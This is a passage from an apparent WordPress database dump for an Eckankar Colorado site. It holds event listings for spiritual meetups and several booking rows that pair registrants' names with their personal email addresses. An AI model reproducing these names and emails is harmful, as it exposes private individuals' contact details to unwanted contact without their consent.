love.</span></p>\r\n<blockquote class=\"\">\r\n<p><span style=\"font-size: 14pt; color: #484848;\">“By breaking the hold of karma from the past, you can get off the wheel of reincarnation in this very lifetime.</span><br>\r\n<span style=\"font-size: 14pt; color: #6d6d6d;\"><span style=\"color: #484848;\">… you can enter a new chapter in Soul’s journey as a Self-Realized, and ultimately God-Realized, being. Life will take on new purpose. Move from the cycle of karmic learning to living fully in the presence of God as a vehicle for love and divine service.”</span>&nbsp;</span></p>\r\n<p><span style=\"font-size: 14pt;\"><a href=\"http://www.eckankar.org/\" target=\"_blank\" rel=\"noopener\">www.eckankar.org</a></span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/285762932/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'12 Gifts of Spiritual Living: Resolving Karma Easily\'','','publish','closed','closed','','meetup-online12-gifts-of-spiritual-living-resolving-karma-easily','','','2022-05-23 13:45:50','2022-05-23 19:45:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266657',0,'mec-events','',0),(266658,15,'2022-05-08 08:26:37','2022-05-08 14:26:37','','Karma','','inherit','closed','closed','','karma','','','2022-05-08 08:26:37','2022-05-08 14:26:37','',266657,'https://eckankar-colorado.org/wp-content/uploads/2022/05/Karma.webp',0,'attachment','image/webp',0),(266660,1000007,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Marc Massengale  - billybobak@yahoo.com','','publish','closed','closed','','marc-massengale-billybobakyahoo-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266660',0,'mec-books','',0),(266661,1000008,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Jacqueline Diane Roberts - jackiedianeroberts@icloud.com','','publish','closed','closed','','jacqueline-diane-roberts-jackiedianerobertsicloud-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266661',0,'mec-books','',0),(266662,1000009,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Lynnzie - lynnzies3@gmail.com','','publish','closed','closed','','lynnzie-lynnzies3gmail-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266662',0,'mec-books','',0),(266663,1000010,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Uche - uchenwamoh@yahoo.com','','publish','closed','closed','','uche-uchenwamohyahoo-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266663',0,'mec-books','',0),(266664,1000003,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Sue Haebig - sue2earth@msn.com','','publish','closed','closed','','sue-haebig-sue2earthmsn-com-2','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/mec-books/sue-haebig-sue2earthmsn-com-2/',0,'mec-books','',0),(266665,1000011,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Michele  - sewgoodseed@gmail.com','','publish','closed','closed','','michele-sewgoodseedgmail-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/mec-books/michele-sewgoodseedgmail-com/',0,'mec-books','',0),(266666,1000011,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Michele  - sewgoodseed@gmail.com','','publish','closed','closed','','michele-sewgoodseedgmail-com-2','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/mec-books/michele-sewgoodseedgmail-com-2/',0,'mec-books','',0),(266667,1000012,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Lynn Gardner - lynnie626@gmail.com','','publish','closed','closed','','lynn-gardner-lynnie626gmail-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/mec-books/lynn-gardner-lynnie626gmail-com/',0,'mec-books','',0),(266668,0,'2022-05-08 10:43:38','2022-05-08 16:43:38','','','','publish','closed','closed','','266668','','','2022-05-08 10:43:38','2022-05-08 16:43:38','',0,'https://eckankar-colorado.org/nf_sub/266668/',0,'nf_sub','',0),(266669,1000013,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Tony Olih Nwaokolobia - acongem@gmail.com','','publish','closed','closed','','tony-olih-nwaokolobia-acongemgmail-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/mec-books/tony-olih-nwaokolobia-acongemgmail-com/',0,'mec-books','',0),(266670,1000014,'2022-05-08 10:30:00','2022-05-08 16:30:00','','kery colvin - keanchico@yahoo.com','','publish','closed','closed','','kery-colvin-keanchicoyahoo-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/mec-books/kery-colvin-keanchicoyahoo-com/',0,'mec-books','',0),(266671,0,'2022-05-08 11:58:58','2022-05-08 17:58:58','','','','publish','closed','closed','','266671','','','2022-05-08 11:58:58','2022-05-08 17:58:58','',0,'https://eckankar-colorado.org/nf_sub/266671/',0,'nf_sub','',0),(266672,0,'2022-05-08 12:02:55','2022-05-08 18:02:55','','','','publish','closed','closed','','266672','','','2022-05-08 12:02:55','2022-05-08 18:02:55','',0,'https://eckankar-colorado.org/nf_sub/266672/',0,'nf_sub','',0),(266673,1000015,'2022-05-15 11:45:00','2022-05-15 17:45:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com','','','2022-05-15 11:45:00','2022-05-15 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266673',0,'mec-books','',0),(266674,1000015,'2022-05-17 19:00:00','2022-05-18 01:00:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-2','','','2022-05-17 19:00:00','2022-05-18 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266674',0,'mec-books','',0),(266675,0,'2022-05-10 09:52:23','2022-05-10 15:52:23','','','','publish','closed','closed','','266675','','','2022-05-10 09:52:23','2022-05-10 15:52:23','',0,'https://eckankar-colorado.org/nf_sub/266675/',0,'nf_sub','',0),(266676,15,'2022-05-10 17:15:16','2022-05-10 23:15:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Within my circle of family, friends and pets I have had many experiences that confirms to me without a doubt that we do indeed live on beyond this earthly world.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Have you ever had an after-death communication from a loved one? Come share your stories with people who understand such experiences are valid. There are many who have shared your experience.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In the great cycle of birth, life and death, many people are uncertain about what happens after our physical existence ceases. Is there really such a thing as life after death? Can we gain experience of this journey of Soul—while still living in the physical world?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Understanding more about our true spiritual nature and our spiritual experiences can provide personal proof of Soul\'s eternal nature and can answer questions as to what lies beyond this life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come explore the eternal, divine wonder of you!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for this free spiritual discussion to share your own insights, learn from those of others, and try a spiritual exercise or two. Let’s dig deeper into the topic each time.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We look forward to exchanging insights and experiences! Find a link to the book <em>Life After Death</em>&nbsp;in the Soul Adventure magazine. Visit&nbsp;<strong><a class=\"link\" href=\"http://www.souladventuremagazine.org/\" target=\"_blank\" rel=\"noopener\">Soul Adventure Magazine</a></strong>. Click on View Current Issue. See the Life After Death story of a man that goes to visit his barber. You are welcome to explore this book before the discussion.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more information about Eckankar, The Path of Spiritual Freedom, visit&nbsp;<strong><a class=\"link\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"noopener\">Eckankar</a></strong>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/285799927/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p>&nbsp;</p>\r\n<p class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong><span>&nbsp;We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>Life After Death','','publish','closed','closed','','meetup-in-personlife-after-death','','','2022-05-10 17:19:34','2022-05-10 23:19:34','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266676',0,'mec-events','',0),(266677,15,'2022-05-10 17:14:12','2022-05-10 23:14:12','','LifeAfterDeath','','inherit','closed','closed','','lifeafterdeath','','','2022-05-10 17:14:12','2022-05-10 23:14:12','',266676,'https://eckankar-colorado.org/wp-content/uploads/2022/05/LifeAfterDeath.webp',0,'attachment','image/webp',0),(266682,0,'2022-05-12 13:55:16','2022-05-12 19:55:16','','','','publish','closed','closed','','266682','','','2022-05-12 13:55:16','2022-05-12 19:55:16','',0,'https://eckankar-colorado.org/nf_sub/266682/',0,'nf_sub','',0),(266683,1000016,'2022-05-15 11:45:00','2022-05-15 17:45:00','','Elizabeth Brandes - elizabethstar1@yahoo.com','','publish','closed','closed','','elizabeth-brandes-elizabethstar1yahoo-com','','','2022-05-15 11:45:00','2022-05-15 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266683',0,'mec-books','',0),(266686,1000015,'2022-05-17 19:00:00','2022-05-18 01:00:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-3','','','2022-05-17 19:00:00','2022-05-18 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266686',0,'mec-books','',0),(266688,2,'2022-05-21 12:59:45','2022-05-21 18:59:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br>\r\n</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Any Chela in good standing who is not already in a Satsang may attend this class. <strong>It will remain open for 3 months and then will be closed to newcomers.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.<br>\r\n<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>***</strong><em>This event will be indoors. Please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>','In Person ECK Satsang Class<br>\'The Easy Way\'','','publish','closed','closed','','in-person-eck-satsang-classthe-easy-way','','','2023-03-27 13:17:20','2023-03-27 19:17:20','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266688',0,'mec-events','',0),(266690,15,'2022-05-22 08:46:41','2022-05-22 14:46:41','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"flex justify-between\">\r\n<h2 class=\"font-semibold text-xl mb-5\"><span style=\"font-family: \'Open Sans\', Helvetica, Arial, sans-serif; font-size: 14pt; color: #333333;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></h2>\r\n</div>\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by discussion groups, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience the Sound of Soul: HU - In Person','','publish','closed','closed','','experience-the-sound-of-soul-hu-in-person','','','2022-05-23 07:58:35','2022-05-23 13:58:35','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266690',0,'mec-events','',0),(266691,1000017,'2022-06-19 11:45:00','2022-06-19 17:45:00','','Iyke Uche - blueseausa@yahoo.com','','publish','closed','closed','','iyke-uche-blueseausayahoo-com','','','2022-06-19 11:45:00','2022-06-19 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266691',0,'mec-books','',0),(266692,0,'2022-05-23 18:43:22','2022-05-24 00:43:22','','','','publish','closed','closed','','266692','','','2022-05-23 18:43:22','2022-05-24 00:43:22','',0,'https://eckankar-colorado.org/nf_sub/266692/',0,'nf_sub','',0),(266710,0,'2022-05-24 09:18:06','2022-05-24 15:18:06','','','','publish','closed','closed','','266710','','','2022-05-24 09:18:06','2022-05-24 15:18:06','',0,'https://eckankar-colorado.org/nf_sub/266710/',0,'nf_sub','',0),(266711,1000018,'2022-06-21 19:00:00','2022-06-22 01:00:00','','Candy Rushold - crushold@me.com','','publish','closed','closed','','candy-rushold-crusholdme-com','','','2022-06-21 19:00:00','2022-06-22 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266711',0,'mec-books','',0),(266713,15,'2022-05-25 18:02:31','2022-05-26 00:02:31','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Problems? Problems! Why do we have so many? What causes them? Can we avoid them?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The Spiritual Experiences Group of Pagosa Springs invites you to join us for a practical and spiritual approach to problem-solving. Learn creative, time-tested techniques that can help you change your viewpoint and overcome difficulties.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This IN-PERSON event will be held at the Pagosa Lakes Property Owners Association located at 240 Port Avenue on Sunday, June 12th at 1:00 p.m.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will have the opportunity to discuss with others of like heart some of these many techniques:</span></p>\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Work beyond symptoms to solutions</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Conquer your fears</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Kindle your creativity</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Understand how karma can play a role</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Experience a technique that can provide spiritual guidance</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">People of all faiths and beliefs are welcome. This event, sponsored by Eckankar, the Path of Spiritual Freedom, is free of charge.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong><span class=\"\">&nbsp;We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health</span></div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286100043/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>Spiritual Keys to Solving Problems','','publish','closed','closed','','meetup-in-personspiritual-keys-to-solving-problems','','','2022-05-25 20:49:26','2022-05-26 02:49:26','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266713',0,'mec-events','',0),(266714,15,'2022-05-25 17:58:04','2022-05-25 23:58:04','','Chains','','inherit','closed','closed','','chains','','','2022-05-25 17:58:04','2022-05-25 23:58:04','',266713,'https://eckankar-colorado.org/wp-content/uploads/2022/05/Chains.webp',0,'attachment','image/webp',0),(266715,2,'2022-05-26 10:47:52','2022-05-26 16:47:52','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">Are you wondering why your life is the way it is?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you have difficulty trusting Spirit to have your best interest at heart?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you want to recognize and trust in the Divine plan?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this ECK Light and Sound Service will help you see the hand of the Divine in your life and to learn to trust the blessings that come to you each day. You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting.<br>\r\n<br>\r\n</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #23507d; margin-top: -15px; margin-left: 20px;\">\r\n<p><span>Harold Klemp writes in his book <em>Wisdom of the Heart</em>, Book 3,</span></p>\r\n<p><span style=\"color: #666666;\">“<span>In the lower worlds, the Law of Cause and Effect, the Law of Karma, is in force. You must know <em>how</em> to live under it. The Law of Cause and Effect, and the experiences that derive from your understanding …. or <em>lack</em> of understanding of that law, also bring you to a realization, or an acceptance of divine love.</span>”</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nTo get the Zoom login information, just fill out the form below. Hope to see you there!</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Light and Sound Service - In Person & Online<br>\'Karma: God\'s Love in Action\'','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinekarma-gods-love-in-action','','','2022-05-26 11:10:20','2022-05-26 17:10:20','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266715',0,'mec-events','',0),(266716,2,'2022-05-26 10:45:25','2022-05-26 16:45:25','','ruins-2','','inherit','closed','closed','','ruins-2','','','2022-05-26 10:45:25','2022-05-26 16:45:25','',266715,'https://eckankar-colorado.org/wp-content/uploads/2022/05/ruins-2.jpg',0,'attachment','image/jpeg',0),(266719,2,'2022-05-26 11:35:01','2022-05-26 17:35:01','<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\">\r\n<div></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound, and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this IN-PERSON event in Pagosa Springs, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and a discussion group, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.<br>\r\n<br>\r\n</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286115354/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"\"><span style=\"font-size: 12pt; color: #616161;\" class=\"\"><strong>COVID-19 safety measures -Event will be indoors</strong></span></div>\r\n<div class=\"\"><span style=\"font-size: 12pt; color: #616161;\" class=\"\"><em>** We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>\'Experience HU, the Sound of Soul\'','','publish','closed','closed','','meetup-in-personexperience-hu-the-sound-of-soul','','','2022-05-26 11:46:21','2022-05-26 17:46:21','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266719',0,'mec-events','',0),(266720,2,'2022-05-26 11:33:04','2022-05-26 17:33:04','','hu-water-1','','inherit','closed','closed','','hu-water-1','','','2022-05-26 11:33:04','2022-05-26 17:33:04','',266719,'https://eckankar-colorado.org/wp-content/uploads/2022/05/hu-water-1.jpg',0,'attachment','image/jpeg',0),(266722,2,'2022-05-26 11:58:18','2022-05-26 17:58:18','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">What do you do to celebrate life each day?<br>\r\n</span><span style=\"font-size: 16pt;\">How do you help others recognize the gifts of life?<br>\r\n</span></strong><span style=\"font-size: 16pt;\"><strong>What role does love play – especially loving yourself as Soul?</strong><br>\r\n</span></p>\r\n<p class=\"\" style=\"margin-top: -14px;\">&nbsp;</p>\r\n<br>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“We serve God and life out of gratitude. Why? For the blessings we have received.<br>\r\n“What is the greatest blessing? The gift of life itself. It’s living. It’s getting more experience in life, learning more about who and what we are.</span></p>\r\n<p><span style=\"color: #666666; font-size: 14pt;\">The more you learn about yourself, the more you have to give back to life. It’s natural. You have to. Your heart opens, you have greater capacity for love. To get more love, you have to give more love. As you give more, you get more.\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>Truth Has No Secrets, </em>page 58</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are invited to join a discussion about the value of this life – and each previous lifetime. Please share your stories of how you are grateful for the good times – and what you have gained from the difficult times.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR</a></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending</span></p>\r\n<br>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/286114494/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Celebrating Life Every Day\'','','publish','closed','closed','','meetup-onlinecelebrating-life-every-day','','','2022-05-26 12:05:52','2022-05-26 18:05:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266722',0,'mec-events','',0),(266723,2,'2022-05-26 11:57:06','2022-05-26 17:57:06','','hilltop-joy','','inherit','closed','closed','','hilltop-joy','','','2022-05-26 11:57:06','2022-05-26 17:57:06','',266722,'https://eckankar-colorado.org/wp-content/uploads/2022/05/hilltop-joy.jpg',0,'attachment','image/jpeg',0),(266725,2,'2022-05-26 12:21:16','2022-05-26 18:21:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Did you know God learns through you?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you wonder if your life makes a 